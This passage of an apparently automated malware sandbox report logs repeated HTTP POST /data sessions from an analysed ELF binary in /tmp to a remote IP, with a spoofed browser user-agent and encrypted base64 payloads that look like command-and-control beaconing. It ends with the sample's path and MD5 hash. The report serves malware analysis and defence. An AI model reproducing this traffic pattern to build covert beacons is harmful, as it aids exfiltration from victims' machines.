                          4192.168.2.1344280142.93.165.20380
                          TimestampBytes transferredDirectionData
                          Mar 21, 2025 13:03:32.946372986 CET415OUTPOST /data HTTP/1.1
                          Host: 142.93.165.203
                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 220
                          Accept-Encoding: gzip
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 2b 72 6c 56 74 55 53 37 4d 4a 6a 31 73 34 69 64 59 70 7a 69 46 4a 6f 78 4d 34 2b 47 6a 6d 32 6c 61 46 45 45 6e 61 54 76 70 6f 48 73 78 65 4e 44 73 62 63 57 45 34 6c 34 78 6a 50 6c 69 79 30 35 77 30 54 2b 58 36 63 48 43 45 52 74 39 4c 35 39 47 4d 79 54 35 63 79 32 66 32 2b 64 4f 38 4a 79 39 6e 78 79 54 65 69 64 36 30 44 4e 6e 42 4b 49 71 46 48 39 4d 6c 4c 5a 79 65 4b 57 52 41 6e 34 70 4c 49 36 47 36 64 75 42 67 31 4e 7a 42 64 4a 77 61 62 70 56 38 74 69 49 44 70 50 69 6e 31 56 79 47 56 44 33 47 53 48 68 45 30 3d
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE1+rlVtUS7MJj1s4idYpziFJoxM4+Gjm2laFEEnaTvpoHsxeNDsbcWE4l4xjPliy05w0T+X6cHCERt9L59GMyT5cy2f2+dO8Jy9nxyTeid60DNnBKIqFH9MlLZyeKWRAn4pLI6G6duBg1NzBdJwabpV8tiIDpPin1VyGVD3GSHhE0=
                          Mar 21, 2025 13:03:33.122598886 CET457INHTTP/1.1 200 OK
                          Cache-Control: max-age=0, no-cache
                          Content-Length: 176
                          Content-Type: application/javascript; charset=utf-8
                          Content-Type: application/octet-stream
                          Date: Fri, 21 Mar 2025 12:03:33 GMT
                          Pragma: no-cache
                          Server: NetDNA-cache/2.2
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 76 33 37 65 76 2f 34 57 4e 69 51 44 71 41 30 64 5a 54 5a 65 68 4f 48 6d 4b 52 6a 6a 6a 42 62 42 42 59 51 68 46 5a 52 31 73 79 4e 45 77 66 55 2b 79 62 46 56 4d 4b 34 61 4e 67 59 45 47 38 74 34 7a 74 51 35 73 42 30 5a 6c 71 66 38 7a 63 4f 39 4c 78 72 54 53 58 68 62 74 4f 4e 4b 76 4f 39 63 62 51 4c 62 35 30 63 41 6b 42 79 70 39 67 4d 50 58 55 6b 4a 45 52 4b 36 32 74 7a 74 68 45 41 42
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE1v37ev/4WNiQDqA0dZTZehOHmKRjjjBbBBYQhFZR1syNEwfU+ybFVMK4aNgYEG8t4ztQ5sB0Zlqf8zcO9LxrTSXhbtONKvO9cbQLb50cAkByp9gMPXUkJERK62tzthEAB


                          Session IDSource IPSource PortDestination IPDestination Port
                          5192.168.2.1344282142.93.165.20380
                          TimestampBytes transferredDirectionData
                          Mar 21, 2025 13:03:42.313136101 CET415OUTPOST /data HTTP/1.1
                          Host: 142.93.165.203
                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 220
                          Accept-Encoding: gzip
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 55 44 4f 53 72 39 37 38 7a 32 71 46 71 7a 55 75 50 51 64 34 44 46 48 57 4d 30 63 4a 76 32 30 56 45 2f 45 4a 77 4a 6f 45 50 70 30 41 61 41 36 77 39 77 30 6f 6a 61 43 4c 6b 42 62 61 52 54 75 4e 79 54 6e 4f 7a 71 4e 5a 52 7a 38 63 70 69 53 72 52 4d 4a 59 77 54 49 70 53 4c 37 61 4f 53 47 37 70 44 42 78 72 4d 6e 51 58 47 72 44 73 6f 2b 79 57 56 77 6e 4c 38 6c 41 5a 6a 56 76 59 39 4e 4a 57 51 57 6c 56 4f 59 51 76 53 65 68 63 65 37 43 69 32 44 61 57 4f 77 51 71 67 74 4d 6f 50 2f 38 32 62 6b 62 55 34 2b 39 43 37 45 3d
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE1UDOSr978z2qFqzUuPQd4DFHWM0cJv20VE/EJwJoEPp0AaA6w9w0ojaCLkBbaRTuNyTnOzqNZRz8cpiSrRMJYwTIpSL7aOSG7pDBxrMnQXGrDso+yWVwnL8lAZjVvY9NJWQWlVOYQvSehce7Ci2DaWOwQqgtMoP/82bkbU4+9C7E=
                          Mar 21, 2025 13:03:42.487103939 CET457INHTTP/1.1 200 OK
                          Cache-Control: max-age=0, no-cache
                          Content-Length: 176
                          Content-Type: application/javascript; charset=utf-8
                          Content-Type: application/octet-stream
                          Date: Fri, 21 Mar 2025 12:03:42 GMT
                          Pragma: no-cache
                          Server: NetDNA-cache/2.2
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 68 6a 30 79 38 30 70 6f 34 79 6d 39 54 6e 37 44 43 76 33 2f 6e 73 44 30 44 39 77 56 7a 62 4b 6a 74 2b 33 4a 6f 56 37 65 2f 70 49 6a 45 4b 56 66 34 2b 42 39 47 71 75 69 52 73 50 38 59 55 65 72 41 49 54 43 48 56 77 49 6f 44 69 68 68 32 46 74 57 4f 38 42 31 4a 71 64 58 4a 6d 47 49 4c 57 74 6a 76 34 64 56 59 7a 53 37 74 2b 66 51 6f 57 48 61 75 30 57 66 6d 63 69 7a 42 53 76 76 50 39 73
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE1hj0y80po4ym9Tn7DCv3/nsD0D9wVzbKjt+3JoV7e/pIjEKVf4+B9GquiRsP8YUerAITCHVwIoDihh2FtWO8B1JqdXJmGILWtjv4dVYzS7t+fQoWHau0WfmcizBSvvP9s


                          Session IDSource IPSource PortDestination IPDestination Port
                          6192.168.2.1344284142.93.165.20380
                          TimestampBytes transferredDirectionData
                          Mar 21, 2025 13:03:54.716978073 CET415OUTPOST /data HTTP/1.1
                          Host: 142.93.165.203
                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 220
                          Accept-Encoding: gzip
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 75 6e 30 36 6c 59 56 46 35 32 63 50 63 58 6d 70 52 47 6f 4c 59 30 36 7a 30 74 73 63 38 78 66 54 49 59 77 43 74 46 73 6f 5a 6f 37 32 4c 32 37 53 65 4a 6c 53 55 47 57 37 69 4f 7a 31 51 6b 65 49 2b 47 4f 45 31 46 70 36 75 72 6a 37 31 4b 61 72 77 36 4b 6c 6a 4a 6c 35 49 4f 55 74 58 59 43 46 69 4d 78 5a 66 30 42 78 65 45 35 63 2f 59 61 35 4a 46 76 49 75 67 6e 72 69 67 68 79 4b 6d 69 64 64 32 2b 42 69 47 6b 58 68 33 64 67 4e 4a 33 63 38 55 37 4d 38 48 50 37 33 50 4d 62 77 50 55 6a 6c 4c 42 4c 39 4c 61 64 58 6c 55 3d
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE1un06lYVF52cPcXmpRGoLY06z0tsc8xfTIYwCtFsoZo72L27SeJlSUGW7iOz1QkeI+GOE1Fp6urj71Karw6KljJl5IOUtXYCFiMxZf0BxeE5c/Ya5JFvIugnrighyKmidd2+BiGkXh3dgNJ3c8U7M8HP73PMbwPUjlLBL9LadXlU=
                          Mar 21, 2025 13:03:54.899370909 CET457INHTTP/1.1 200 OK
                          Cache-Control: max-age=0, no-cache
                          Content-Length: 176
                          Content-Type: application/javascript; charset=utf-8
                          Content-Type: application/octet-stream
                          Date: Fri, 21 Mar 2025 12:03:54 GMT
                          Pragma: no-cache
                          Server: NetDNA-cache/2.2
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 32 63 52 6f 79 32 6c 49 6f 42 38 56 50 68 57 41 59 6a 30 2f 33 48 4d 74 49 79 4f 38 66 4d 31 6f 59 74 72 38 51 67 38 6d 63 6e 51 4b 57 46 4d 58 33 65 31 66 6b 4c 75 61 68 2b 30 59 4c 31 69 4d 33 45 41 31 30 2b 4f 37 53 4b 43 62 6c 79 52 68 6b 57 35 6f 57 2f 31 72 56 58 4d 76 59 5a 4e 35 78 4f 49 56 6c 77 59 6d 72 6f 6b 56 78 6d 44 30 46 75 32 71 6d 74 6e 39 53 34 68 36 69 6d 4a 63
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE12cRoy2lIoB8VPhWAYj0/3HMtIyO8fM1oYtr8Qg8mcnQKWFMX3e1fkLuah+0YL1iM3EA10+O7SKCblyRhkW5oW/1rVXMvYZN5xOIVlwYmrokVxmD0Fu2qmtn9S4h6imJc


                          System Behavior

                          Start time (UTC):12:03:10
                          Start date (UTC):21/03/2025
                          Path:/tmp/ht-jupit.elf
                          Arguments:/tmp/ht-jupit.elf
                          File size:8158184 bytes
                          MD5 hash:80addee529e137894328a592be4ea153